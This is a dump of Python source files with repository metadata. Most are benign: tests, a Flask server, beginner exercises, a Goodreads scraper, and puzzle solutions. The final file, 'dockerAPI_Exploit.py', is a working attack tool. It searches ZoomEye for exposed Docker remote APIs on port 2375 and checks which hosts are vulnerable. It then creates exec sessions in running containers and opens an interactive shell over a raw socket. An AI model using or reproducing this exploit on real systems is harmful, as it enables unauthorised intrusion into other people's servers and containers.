| blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 2–616) | content_id (string, len 40) | detected_licenses (list, len 0–69) | license_type (string, 2 classes) | repo_name (string, len 5–118) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (string, len 4–63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k–686M, nullable ⌀) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 2–10.3M) | extension (string, 246 classes) | content (string, len 2–10.3M) | authors (list, len 1) | author_id (string, len 0–212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a46442916b41bb43efc65236b85e65474c9b6cbc
|
4058934db71013da9e5ccaaeb7e169dacc588b49
|
/cli/tests/test_validators.py
|
922f4062da4918b43eec378dbd12f26031c458eb
|
[
"MIT"
] |
permissive
|
zabaweb/lime-comb
|
c594f35724cc46f853f5a18a1310d9870610ba04
|
38c72b2f3ee1d9113d82e67c946a82d9d606dea8
|
refs/heads/master
| 2021-02-19T01:57:53.258141
| 2020-03-05T21:08:48
| 2020-03-05T21:08:48
| 245,265,936
| 0
| 0
|
MIT
| 2020-03-05T20:55:19
| 2020-03-05T20:55:18
| null |
UTF-8
|
Python
| false
| false
| 1,524
|
py
|
import builtins
from collections import defaultdict
from unittest.mock import MagicMock, patch
import lime_comb
import yaml
from lime_comb.validators.bool import validate_bool
from lime_comb.validators.email import lc_validate_email
from lime_comb.validators.file import validate_filepath
from .conftest import *
class TestValidator:
@pytest.mark.parametrize(
"file_path,raises", [("/etc/hosts", False), ("/no/such/file", True),],
)
def test_validate_filepath(self, file_path, raises):
if raises:
with pytest.raises(Exception):
validate_filepath(file_path)
else:
assert validate_filepath(file_path)
@pytest.mark.parametrize(
"value,raises",
[
("False", False),
("True", False),
("true", False),
("True", False),
(True, False),
(False, False),
("Some Value", True),
],
)
def test_validate_bool(self, value, raises):
if raises:
with pytest.raises(Exception):
validate_bool(value)
else:
assert None == validate_bool(value)
@pytest.mark.parametrize(
"email,raises",
[("llama", True), ("llama@llama", True), ("llama@llama.net", False),],
)
def test_lc_validate_email(self, email, raises):
if raises:
with pytest.raises(Exception):
lc_validate_email(email)
else:
lc_validate_email(email)
|
[
"marcin.niemira@gmail.com"
] |
marcin.niemira@gmail.com
|
8f370c96ccec3c3c4700881357f9a8ae1539b793
|
d6931f8347729ccff8535c90f5bd7f3a7ec331ee
|
/server.py
|
620ad22ddd3a227fbe30bac5d010f001810cfdb1
|
[
"MIT"
] |
permissive
|
vilmarzti/deepwriting
|
b237105d907a3eb702263c0d3a014e939fc8b181
|
9ba1feb7e472fea727761bc57d03b4f6cf417022
|
refs/heads/master
| 2021-07-14T05:04:23.924526
| 2020-10-17T15:23:48
| 2020-10-17T15:23:48
| 217,344,425
| 0
| 0
| null | 2019-10-24T16:29:13
| 2019-10-24T16:29:12
| null |
UTF-8
|
Python
| false
| false
| 2,553
|
py
|
from flask import Flask, escape, request
from flask_cors import CORS
from data_scripts.json_to_numpy import fetch_sample_from_dict, scale_zero_one
from data_scripts.preprocessing import process_dataset
from classify_hw import getModel, getConfig, process_result
import numpy as np
from source import data_utils
app = Flask(__name__)
cors = CORS(app)
alphabet = list(
"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'.,-()/"
) # %:;&# '\x00' character, i.e., ord(0) to label concatenations.
alphabet.insert(0, chr(0))
config_dict = getConfig()
@app.route('/', methods=["POST"])
def evaluate():
json = request.json
parsed_json = parse_json(json)
args = Args()
process_dataset(args, parsed_json, 'data_preprocessed')
model, sess, training_dataset = getModel(config_dict)
result = model.classify_given_sample(sess, np.array([training_dataset.data_dict['samples'][0]]))
processed_result = process_result(result[0], alphabet)
return processed_result
class Args:
def __init__(self):
self.amount_validation_samples = -1
self.data_file = ['/home/martin/Documents/code/python3/deepwriting-module/data/deepwriting_dataset/deepwriting-data.npz']
self.eoc_labels = False
self.fixed_length_chunks = None
self.merge_input_dictionaries_first = False
self.out_dir = '/home/martin/Documents/code/deepwriting-module/data/deepwriting_dataset'
self.out_file = ['data_preprocessed']
self.relative_representation = True
self.scale_data_zero_one = False
self.semantic_chunks_max_len = 0
self.standardize_data = True
self.translate_to_origin = True
def parse_json(json):
data_dict_1 = create_data_dict()
data_dict_2 = create_data_dict()
fetch_sample_from_dict(data_dict_1, json, False, False)
data_dict_2 = data_utils.dictionary_merge(
[data_dict_1, data_dict_2],
inplace_idx=0,
keys_frozen=['alphabet'],
verbose=0
)
data_dict_2 = scale_zero_one(data_dict_2)
return data_dict_2
def create_data_dict():
data_dict = {}
data_dict['samples'] = []
data_dict['char_labels'] = []
data_dict['word_labels'] = []
data_dict['subject_labels'] = []
data_dict['texts'] = []
data_dict['eow_labels'] = []
data_dict['bow_labels'] = []
data_dict['eoc_labels'] = []
data_dict['boc_labels'] = []
data_dict['alphabet'] = alphabet
return data_dict
def main():
app.run(port=5000)
if __name__ == "__main__":
main()
|
[
"villavicencio.martin@protonmail.com"
] |
villavicencio.martin@protonmail.com
|
fa49c7e396c61962996bf2618fcf092a10a9836f
|
793ea0a09f52886641f0eea5098f90235264726f
|
/Python weekend class_sindhuja.py
|
aa1587249129e3bb6a5fa18bb48aabd5ce8ff182
|
[] |
no_license
|
sindhujasankar/Weekend-python1_sindhuja
|
346f398700de03ab930d20b08c53f5ce00c524d2
|
4bbba73deda1a410726828c9dc497cf29e7c0eaf
|
refs/heads/master
| 2020-06-25T00:16:33.882482
| 2019-07-27T08:13:27
| 2019-07-27T08:13:27
| 199,136,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import sys
print sys.version
# In[2]:
import sys
print (sys.version)
# In[3]:
x=5
y=10
print(x+y)
# In[5]:
Description="Python is a interpreted language"
print(description)
# In[6]:
Description="Python is a interpreted language"
print(Description)
# In[7]:
first name="sindhuja"
print(first name)
# In[8]:
first_name="sindhuja"
print(first_name)
# In[9]:
first_name="sindhuja"
lasy_name="sankar"
print(first_name.title())
# In[10]:
name="sindhuja sankar"
print(name.upper())
# In[11]:
name="SINDHUJA SANKAR"
print(name.lower())
# In[12]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}"
# In[13]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}"
print(name)
# In[14]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}""
print(name)
# In[17]:
first_name='sindhuja'
last_name='sankar'
name=f" {first_name} {last_name} "
print(name)
# In[18]:
first_name="sindhuja"
last_name="sankar"
name=f" {first_name} {last_name} "
print(name)
# In[19]:
first_name="sindhuja"
last_name="sankar"
print(first_name,last_name)
# In[1]:
car_name="lamboghini/t/tford/tfreestyle"
print(car_name)
# In[2]:
car_name="lamboghini\t\tford\tfreestyle"
print(car_name)
# In[3]:
car_name="lamboghini\s\tford\tfreestyle"
print(car_name)
# In[6]:
briyani_hotel="yamoidheen\nRasavi\nParadise\nApplebees"
print(briyani_hotel)
# In[7]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.strip())
# In[11]:
Cartoon_names=" Dora bhuji mottu patlu "
pet_names="dolmacian"
print(Cartoon_names.strip(),pet_names)
# In[9]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.rstrip())
# In[10]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.lstrip())
# In[ ]:
|
[
"noreply@github.com"
] |
sindhujasankar.noreply@github.com
|
f9913f3556b1abaf280deef537f25348894732c1
|
bfc6aaa19134348e91501b6063c8cb79c9caa5d2
|
/quiz/fibonacci.py
|
80ef06bf2713b3a7a9d345858b16bf601ada1d70
|
[] |
no_license
|
siblackburn/python_bali
|
e6c590b8f98639379dc5d3aef7e36b3608bce7e9
|
2a13eae0cc983f09c364c8649397183cdf4bf600
|
refs/heads/master
| 2022-12-20T21:25:34.942452
| 2019-11-10T04:42:37
| 2019-11-10T04:42:37
| 215,207,276
| 0
| 0
| null | 2022-08-23T17:55:27
| 2019-10-15T04:33:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 246
|
py
|
sequence_length = int(input("how many fibonacci numbers do you want?"))
fib_numbers = [1,1]
while len(fib_numbers) < sequence_length:
new_numbers = fib_numbers[-2] + fib_numbers[-1]
fib_numbers.append(new_numbers)
print(fib_numbers)
|
[
"siblackburn@gmail.com"
] |
siblackburn@gmail.com
|
10661efc67a870bbba43ee9b9b447baf6e640a26
|
735bc64c867542c7494e8243e85f97397c81133d
|
/day6/puzzle1.py
|
66e33ed742c48de78686edcf8d039a91ab4e316e
|
[] |
no_license
|
SBird1337/sbird-aoc-2020
|
917910acf367396db3aa4034560801d2101f462c
|
f8d9d8567020fe313f1cad0b475e523740630681
|
refs/heads/master
| 2023-01-27T15:47:42.717262
| 2020-12-08T03:28:01
| 2020-12-08T03:28:01
| 318,240,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/bin/env python3
import os
groups = []
with open('day6/input12.txt', 'r') as f:
for group in f.read().split('\n\n'):
group = group.replace('\n', '')
groups.append(len("".join(set(group))))
print(sum(groups))
|
[
"philipp@karathan.at"
] |
philipp@karathan.at
|
48ba67277d3c5ef2ef26260e41518199f006f2c3
|
4aa971f59634c3e6aca66d9afa32a0dc12af246b
|
/suning/settings_test.py
|
bbf24e9285975203f9d30dadb86e43f13a881461
|
[] |
no_license
|
cash2one/wancloujia-o3m
|
613889779dd0c46e8444aed7e5a249a23e7c37aa
|
94645f103f4a366eb37a12be8634f0d61dd2a2f2
|
refs/heads/master
| 2021-01-19T12:35:18.581918
| 2015-10-02T11:27:11
| 2015-10-02T11:27:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
from suning.settings import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3'
}
}
|
[
"yangchen@jiaoyin.cm"
] |
yangchen@jiaoyin.cm
|
eff8bfc151e7d12e6301e1900b0daefd3667cd2c
|
4ca8df3a127e9b15cbfecea6505928741f685a63
|
/case_crawler/utils/common_tools.py
|
ef618a3b95e404c080d7df456778d067ac19dd4d
|
[] |
no_license
|
gongfei6644/gongfei
|
2beb082c56197bc23ca20a6927ff6c10d8beaa83
|
bfdd5e6a3a8d76ad1e43cf54df186b944cad29e4
|
refs/heads/master
| 2022-11-30T20:49:22.213040
| 2020-08-16T12:52:28
| 2020-08-16T12:52:28
| 286,283,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,210
|
py
|
# coding=utf-8
import hashlib
import re
import time
from functools import wraps
from w3lib.url import canonicalize_url
from setting import config
from utils.common_mysql import get_pagesize_config
website_pagesize = {}
log_path = config.LIST_LOG_DIR
def get_rand_guid(url, unit_price, ym):
# ym = datetime.datetime.now().strftime("%Y%m")
url = canonicalize_url(url)
full = "{}{}{}".format(url, unit_price, ym).encode("utf-8")
md5 = hashlib.md5()
md5.update(full)
guid = md5.hexdigest()
return guid
def check_cityname(city_name):
names = ['地区', '自治', '群岛', '县', '海域']
for name in names:
if name in city_name or city_name in {"阿拉善盟", "锡林郭勒盟", "兴安盟", "神农架林区"}:
result = city_name
break
else:
result = city_name if city_name.endswith("市") else city_name + "市"
return result
def make_urls(sub_info):
'''
通过片区的初始url生成片区所有页码的urls
'''
page_urls = []
total_pages = get_page_size(sub_info["source"], sub_info["city"])
if sub_info["source"] == "城市房产二手房":
page_urls = ["{}/pg{}/".format(
sub_info["sub_area_url"].strip("/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "链家二手房":
page_urls = ["{}/pg{}co32/".format(sub_info["sub_area_url"].replace(
"/co32/", ""), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "中国房产超市二手房":
page_urls = ["{}_p{}.html".format(
sub_info["sub_area_url"].replace(".html", ""), i + 1) for i in range(total_pages)]
elif sub_info["source"] == "房天下二手房":
sub_url = sub_info["sub_area_url"].replace("http:", "https:")
page_urls = ["{}-i3{}/".format(
sub_url.strip("/"), i + 1) if i else sub_url for i in range(total_pages)]
if sub_info['city'] == "北京市":
page_urls = [url.replace("esf1", "esf") + "?_rfss=1" for url in page_urls]
elif sub_info["source"] == "安居客二手房":
page_urls = ["{}/o5-p{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] + "o5/" for i in range(total_pages)]
elif sub_info["source"] == "中原地产二手房":
page_urls = ["{}/u7g{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] + "u7/" for i in range(total_pages)]
elif sub_info["source"] == "诸葛找房二手房":
page_urls = ["{}/page/{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "赶集网二手房":
page_urls = ["{}/pn{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "58同城二手房":
page_urls = ["{}/pn{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "Q房网二手房":
page_urls = ["{}/f{}".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
return page_urls
def get_page_size(source, city_name):
'''
按网站来源,城市,获取网站最大采集页数
:param source:数据源网站
:param city_name:城市名
:return: page_size
'''
global website_pagesize
if website_pagesize == {}:
website_pagesize = get_pagesize_config()
first_tier_cities_list = {"北京市", "上海市", "广州市", "深圳市"}
city_key = "generic_city"
# 判断是否为一线城市
if city_name in first_tier_cities_list:
city_key = "first_tier_cities"
page_size = website_pagesize.get(source, {}).get(city_key, 30)
return page_size
class ClsSingleton():
"""单例基础类"""
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_the_instance'):
cls._the_instance = object.__new__(cls)
return cls._the_instance
def format_num(t):
"""数字元组转成数字"""
r = 0
if isinstance(t, tuple):
try:
for i, v in enumerate(t):
r += int(v) * 10 ** ((len(t) - 1 - i) * 3)
r = str(r)
except:
pass
elif isinstance(t, str):
r = t.replace(",", "")
else:
r = t
return r
def timeit(func):
"""定义装饰器的函数"""
@wraps(func)
def inner(*args, **kwargs):
"""内层函数"""
st = time.time()
result = func(*args, **kwargs)
et = time.time()
print("execute the function cost:{}".format(et - st))
return result
return inner
@timeit
def function(a):
"""被装饰函数"""
print("here is func, param is {}".format(a))
def format_date(date_str):
r = re.findall('更新于(.*日)')
if __name__ == '__main__':
function("000")
|
[
"1"
] |
1
|
3d138cb891362f309c9f1e0a25474de6ede5b5bf
|
6d9795fa1aafc0fa5316020aaa0eaa4f68b76229
|
/dashboard/admin.py
|
0cc378351808cb988c751a50626303004d51f468
|
[] |
no_license
|
icerahi/immolists
|
02d379a22c193e793b26e35828b5eebff33bf888
|
813333c3923385861f111bb7aa715aeb04108c3a
|
refs/heads/master
| 2022-12-15T15:00:39.844142
| 2022-01-06T10:06:44
| 2022-01-06T10:06:44
| 196,600,572
| 0
| 0
| null | 2022-11-22T04:14:43
| 2019-07-12T15:12:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 129
|
py
|
from django.contrib import admin
# Register your models here.
from accounts.models import Profile
admin.site.register(Profile)
|
[
"zanjarwhite@gmail.com"
] |
zanjarwhite@gmail.com
|
e5181625fe4c0c87d3fabc860eb6ed72d2377e55
|
1b405f2181960f63da9ea176be1ff9145b98d0d8
|
/webempresa/blog/urls.py
|
31f7b49977e5b76222d1e72a8028275658961476
|
[] |
no_license
|
mariogonzcardona/web-empresa-curso-django-2
|
15d5005eb639e1534e98b0bf1b0f3dae68a1fda5
|
f0b05bc9a1432b72a6b999df9b29545feefc0765
|
refs/heads/master
| 2020-12-12T15:15:32.978703
| 2020-01-15T21:35:43
| 2020-01-15T21:35:43
| 234,159,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django.urls import path
from . import views
urlpatterns = [
# Paths del core
path('', views.blog,name="blog"),
path('category/<int:category_id>/',views.category,name="category"),
]
|
[
"alejandrogonzalez@uadec.edu.mx"
] |
alejandrogonzalez@uadec.edu.mx
|
e00478f3ddb13e96aa3763bd2c854ff524a10299
|
2541edec51e7947a43546d5aaed9406b863d2968
|
/data/scraped/top_400_books/bestreads/spiders/bestreads_spider.py
|
68f309dffdf04582eb4161d532cf88707da3db36
|
[] |
no_license
|
claire-vk/GoodReads
|
55dca9ca510ac3bd7ada5274696fedab0f767ff0
|
4a44899fd0ab65e886a637c91ead0d59b0ddb677
|
refs/heads/master
| 2021-07-10T14:41:32.488455
| 2020-03-29T21:46:34
| 2020-03-29T21:46:34
| 90,575,384
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,509
|
py
|
from bestreads.items import BestreadsItem
import scrapy
import re
from scrapy.selector import Selector
class bestreads_spider(scrapy.Spider):
name = 'bestreads'
allowed_urls = ['https://www.goodreads.com/']
# 'best books ever' list includes more than 48,000 books - will focus on top 500 for analysis
rootURL = 'https://www.goodreads.com/list/show/1.Best_Books_Ever?page='
start_urls = [rootURL + str(i) for i in range(1,5)]
# # for debug
# start_urls = ['https://www.goodreads.com/list/show/1.Best_Books_Ever?page=1',
# 'https://www.goodreads.com/list/show/1.Best_Books_Ever?page=2']
def verify(self, content):
if isinstance(content, list):
if len(content) > 0:
content = content[0]
# convert unicode to str
return content.encode('ascii','ignore')
else:
return ""
else:
# convert unicode to str
return content.encode('ascii','ignore')
def parse(self, response):
books = response.xpath('//*[@id="all_votes"]/table/tr').extract()
# i=0
for book in books:
ranking = Selector(text=book).xpath('//td[@class="number"]/text()').extract()[0]
ranking = self.verify(ranking)
totalscore = Selector(text=book).xpath('//span[@class="smallText uitext"]/a/text()').extract()[0]
totalscore = re.search('.*:\s(\d*,*\d*,*\d*)', totalscore).group(1)
totalscore = self.verify(totalscore)
url = Selector(text=book).xpath('//a[@class="bookTitle"]/@href').extract()
pageurl = 'https://www.goodreads.com' + url[0]
item = BestreadsItem()
item['Ranking'] = ranking
item['TotalScore'] = totalscore
request = scrapy.Request(pageurl, callback=self.parse_each)
request.meta['item'] = item
yield request
# i+=1
# if i==1:
# break
def parse_each(self, response):
item = response.meta['item']
Title = response.xpath('//div[@class="last col"]/h1/text()').extract_first()
Title = Title.strip()
Title = self.verify(Title)
Author = response.xpath('//div[@class="last col"]/div/span/a/span/text()').extract_first()
Author = self.verify(Author)
Score = response.xpath('//span[@class="average"]/text()').extract_first()
Score = self.verify(Score)
NumberOfRating = response.xpath('//a[@class="actionLinkLite votes"]/span/@title').extract_first()
NumberOfRating = self.verify(NumberOfRating)
NumberOfReviews = response.xpath('//a[@class="actionLinkLite"]/span/span/@title').extract_first()
NumberOfReviews = self.verify(NumberOfReviews)
NumberOfPages = response.xpath('//span[@itemprop="numberOfPages"]/text()').extract_first()
NumberOfPages = re.search('(\d*)\s*pages', NumberOfPages).group(1)
NumberOfPages = self.verify(NumberOfPages)
# looking only at the main genre (i.e. genre under which most of users classified the book)
MainGenre = response.xpath('//a[@class="actionLinkLite bookPageGenreLink"]/text()').extract()
MainGenre = self.verify(MainGenre)
# list of all the genres
allgenres = response.xpath('//div[@class="bigBoxBody"]/div/div/div[@class="left"]').extract()
AllGenres = []
# i=0
for genre in allgenres:
genre_path = Selector(text = genre).xpath('//a[@class="actionLinkLite bookPageGenreLink"]/text()').extract()
AllGenres.append(genre_path)
# i+=1
# if i==1:
# break
AllGenres = reduce(lambda x,y: x+y, AllGenres)
AllGenres = ','.join(AllGenres).strip()
AllGenres = self.verify(AllGenres)
Description = response.xpath('//div[@class="readable stacked"]/span/text()').extract_first()
Description = ''.join(Description).strip()
Description = self.verify(Description)
Year = response.xpath('//div[@class="uitext stacked darkGreyText"]/div/text()').extract()
Year = ''.join(Year)
try:
Year = re.search('.*(\d{4}).*', Year ).group(1)
except:
Year = ''
finally:
Year = self.verify(Year)
BookCover = response.xpath('//div[@class="bookCoverContainer"]/div/a/@href').extract()
BookCoverURL = ['https://www.goodreads.com'+ id_ for id_ in BookCover]
BookCoverURL = self.verify(BookCoverURL)
# long reviews have a different path than short reviews. Need to account for that
reviews = response.xpath('//*[@id="bookReviews"]/div[@class="friendReviews elementListBrown"]').extract()
Reviews = []
# i=0
for review in reviews:
review_path = Selector(text = review).xpath('//span[@class="readable"]/span[@style="display:none"]/text()').extract()
if review_path == []:
review_path = Selector(text = review).xpath('//span[@class="readable"]/span/text()').extract()
Reviews.append(review_path)
else:
Reviews.append(review_path)
# i+=1
# if i==1:
# break
# concatenating all reviews together and grabbing the first few paragraphs. Note: only looking at top 30 reviews.
Reviews = reduce(lambda x,y: x+y, Reviews)
Reviews = ''.join(Reviews).strip()
Reviews = self.verify(Reviews)
# # concatenating all reviews together and grabbing the first few paragraphs. Note: only looking at top 30 reviews.
# Reviews = response.xpath('//div[@class="reviewText stacked"]/span/span[1]/text()').extract()
# Reviews = ''.join(Reviews).strip()
# Reviews = self.verify(Reviews)
item['Title'] = Title
item['Author'] = Author
item['Score'] = Score
item['NumberOfRating'] = NumberOfRating
item['NumberOfReviews'] = NumberOfReviews
item['NumberOfPages'] = NumberOfPages
item['MainGenre'] = MainGenre
item['AllGenres'] = AllGenres
item['Description'] = Description
item['Year'] = Year
item['BookCoverURL'] = BookCoverURL
item['Reviews'] = Reviews
yield item
|
[
"claire.emmanuelle.vignon@gmail.com"
] |
claire.emmanuelle.vignon@gmail.com
|
d662c5c1d517d4f8392df31a97a092976af330d8
|
d66818f4b951943553826a5f64413e90120e1fae
|
/hackerearth/Algorithms/El Nino !/solution.py
|
7ae3ddfd098634f2b9eecc6f17cbdd95c51f04b9
|
[
"MIT"
] |
permissive
|
HBinhCT/Q-project
|
0f80cd15c9945c43e2e17072416ddb6e4745e7fa
|
19923cbaa3c83c670527899ece5c3ad31bcebe65
|
refs/heads/master
| 2023-08-30T08:59:16.006567
| 2023-08-29T15:30:21
| 2023-08-29T15:30:21
| 247,630,603
| 8
| 1
|
MIT
| 2020-07-22T01:20:23
| 2020-03-16T06:48:02
|
Python
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
"""
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from itertools import accumulate
n, m = map(int, input().strip().split())
a = list(map(int, input().strip().split()))
parents = list(map(int, input().strip().split()))
counter = [0 for i in range(n + 1)]
for i in a:
if i <= n:
counter[i] += 1
tree = [[] for i in range(n + 1)]
for i, v in enumerate(parents):
tree[v].append(i + 2)
counter = list(accumulate(counter))
ans = 0
stack = [(1, 0)]
while stack:
node, lvl = stack.pop()
ans += counter[lvl]
for next_node in tree[node]:
stack.append((next_node, lvl + 1))
print(ans)
|
[
"hbinhct@gmail.com"
] |
hbinhct@gmail.com
|
fbf42987cfcf599e54f64fd155b682121131248b
|
018c69e6bfa85a509f6c4ced89d9ecc39c695612
|
/dockerAPI_Exploit.py
|
a5624786b4628e95f51abe6d56c9b8dea08e2554
|
[] |
no_license
|
comahax/Docker-Remote-API-Exploit
|
13f2e3e672bb123e9824e9e4f809499c74ecbc46
|
0275e2ef65df332ce2c4374ab49e74a8cec7fe38
|
refs/heads/master
| 2020-05-23T08:00:09.829117
| 2016-09-13T15:08:32
| 2016-09-13T15:08:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,447
|
py
|
# -*- coding:utf-8 -*-
import requests
import urlparse
import argparse
import json
import socket
import time
import sys
class scan():
def __init__(self):
self.VulnerabilityIp = []
def Check(self,url):
Check_Url = url+'containers/json'
try:
TestRe = requests.get(Check_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
return 1
if 'server' in TestRe.headers.keys():
if 'Docker' in TestRe.headers['server'] and 'Command' in TestRe.text:
print "\33[31m%s :vulnerability\33[0m" %url
self.VulnerabilityIp.append(url)
else:
print '%s :not vulnerable' %url
else:
print '%s :not vulnerable' %url
def Getshell(self,url,host,port):
GetShell_Url = url+'containers/json?all=1'
count = 0
try:
TestRe = requests.get(GetShell_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
exit()
date = TestRe.text
decoded = json.loads(date)
CtrlDocter = []
AccCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh','/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh']
for entries in decoded:
if ("Up" in entries['Status']) and ("Exited" not in entries['Status']) and (entries['Command'] in AccCommand):
count+=1
ID = count
DockerID =entries['Id']
Name = entries['Names']
Image = entries['Image']
Command = entries['Command']
detailed = {'ID':str(ID) , 'Name' :Name[0] ,'Image':Image , 'Command' : Command, 'DockerID' : DockerID}
CtrlDocter.append(detailed)
if count:
print "Control Container Number:%s" %count
for i in CtrlDocter:
print ""
for key , value in i.items():
print "\33[31m"+key+":"+value+"\33[0m"
else:
print "No Container Can Control"
return
print 'Input exit to leave'
while True:
CtrlId = raw_input("Input Container ID:")
if CtrlId == 'exit':
break
Command = CtrlDocter[int(CtrlId) - 1]['Command']
CtrlSId = CtrlDocter[int(CtrlId) - 1]['DockerID'][0:12]
PostUrl = url+'v1.20/containers/'+CtrlSId+'/exec'
HEADER= {
'User-Agent':'Docker-Client/1.8.0 (windows)',
'Content-Length':156,
'Content-Type':'application/json',
'Accept-Encoding':'gzip'}
payload = '{"Tty": true, "Detach": false, "Container": "%s", "User": "", "AttachStdin": true, "Cmd": ["%s"], "AttachStderr": true, "Privileged": false, "AttachStdout": true}' %(CtrlSId,Command)
re = requests.post(PostUrl, headers=HEADER, data = payload)
decoded = json.loads(re.text)
CreatedId = decoded['Id']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host, int(port))
sock.connect(server_address)
execDockerPOSTtwo = '''\
POST /v1.20/exec/CreatedId/start HTTP/1.1
Host: 115.123.123.79:2375
User-Agent: Docker-Client/1.8.0 (windows)
Content-Length: 163
Connection: Upgrade
Content-Type: text/plain
Upgrade: tcp
{"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
'''
execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', CtrlSId).replace('Command', Command)
execDockerPOSTtwo = execDockerPOSTtwo.replace("CreatedId", CreatedId)
time.sleep(1)
sock.sendall(execDockerPOSTtwo)
startinfo = sock.recv(1024*10)
while True:
cmd = raw_input('$:')
sock.sendall(cmd+'\x0d')
time.sleep(2)
if cmd == "exit":
break
print sock.recv(1024*10)
sock.close()
def Panel_Scan(self,Search_keyword,PageNum):
GetTokenUrl = 'https://api.zoomeye.org/user/login'
userinfo ={"username": "username",
"password": "password"}
tokenrl = requests.post(GetTokenUrl,data = json.dumps(userinfo),verify=False)
data = eval(tokenrl.text)
Header = {'Authorization': 'JWT %s' %data['access_token']}
page = 1
TestIpArgs = []
if(Search_keyword == None):
key = 'port:2375 X-Content-Type-Options: nosniff country:"CN"'
else:
key = Search_keyword
while True:
try:
Searchurl = 'https://api.zoomeye.org/host/search?query=%s&page=%s'%(key,str(page))
print 'Search in page :'+str(page)
Searchre = requests.get(Searchurl,headers = Header,verify=False)
GetData = json.loads(Searchre.text)
if PageNum != None:
if page < int(PageNum):
page+=1
else:
break
else:
page+=1
for i in GetData['matches']:
TestIpArgs.append(i['ip'])
except Exception,e:
if str(e.message) == 'matches':
break
print 'Start Test...'
file = open('success.txt','w+')
for TestIp in TestIpArgs:
TestIp = 'http://'+TestIp+':2375/'
print 'test:\t'+TestIp
self.Check(TestIp)
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
file.writelines(IP+'\n')
file.close()
def filescan(self,filepath):
file = open(filepath,'r')
data = file.readlines()
for line in data:
line=line.strip('\n')
self.Check(line)
file.close()
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
def filegetshell(self,filepath):
file = open(filepath,'r')
data = file.readlines()
count = 0
urlargs = []
for line in data:
count+=1
line = line.strip('\n')
TmpUrl = urlparse.urlparse(line)
host= TmpUrl.netloc.split(':')
detail = {'ID':count,'host':host[0],'port':host[1],'url':line}
urlargs.append(detail)
print detail
while True:
num = raw_input('UrlID:')
if num == 'exit':
break
self.Getshell(urlargs[int(num)-1]['url'], urlargs[int(num)-1]['host'],urlargs[int(num)-1]['port'])
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('-u', dest = 'url' , help = 'example:http://111.222.333.444:2375/')
parse.add_argument('-c', dest = 'check' , action = 'store_true', default = False , help = 'check')
parse.add_argument('-g',dest = 'getshell' , action = 'store_true' , default = False , help = 'getshell')
parse.add_argument('-f',dest = 'zoomeye',action = 'store_true',default = False,help = 'Whether Use Zoomeye')
parse.add_argument('-k',dest = 'keyword',help = 'Search keyword default:port:2375 X-Content-Type-Options: nosniff country:"CN"')
